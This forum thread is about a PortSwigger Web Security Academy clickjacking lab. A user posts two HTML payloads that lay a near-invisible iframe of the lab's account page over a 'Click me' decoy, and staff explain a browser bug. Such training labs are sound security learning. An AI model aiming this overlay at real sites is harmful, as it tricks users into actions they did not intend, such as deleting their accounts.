Burp Suite User Forum


Basic clickjacking with CSRF token protection remains unsolved

Tyla | Last updated: Apr 15, 2024 02:17AM UTC

I saw through other posts that the Burp embedded browser is not working, and I tried through Firefox with the same issue: it only showed the login screen instead of the account screen with the delete button. I was able to get the correct screen in the Chrome browser; however, the lab remains unsolved despite getting the iframe "Click me" aligned and delivering the exploit. Using this code with my lab id:

<style>
    iframe {
        position: relative;
        width: 500px;
        height: 700px;
        opacity: 0.00001;
        z-index: 2;
    }
    div {
        position: absolute;
        top: 500px;
        left: 60px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0a1100ce0470c99080d70d270075005e.web-security-academy.net/my-account?id=wiener"></iframe>

Tyla | Last updated: Apr 15, 2024 03:10AM UTC

I also tried the following in the Chrome browser. It aligns, yet the lab is not solved:

<style>
    iframe {
        position: relative;
        width: 100%;
        height: 100%;
        opacity: 0.0001;
        z-index: 2;
    }
    div {
        position: absolute;
        top: 538px;
        left: 100px;
        z-index: 1;
    }
</style>
<div>Click me</div>
<iframe src="https://0a1100ce0470c99080d70d270075005e.web-security-academy.net/my-account?id=wiener"></iframe>

Dominyque, PortSwigger Agent | Last updated: Apr 15, 2024 10:04AM UTC

Hi, there is currently an issue with solving the Clickjacking labs using the later version of the embedded browser (this is due to a flag being set within the browser that is not set by default in normal versions of Chrome). Using a standard version of Chrome should still allow you to solve these labs in the interim (whilst we implement a more permanent solution).
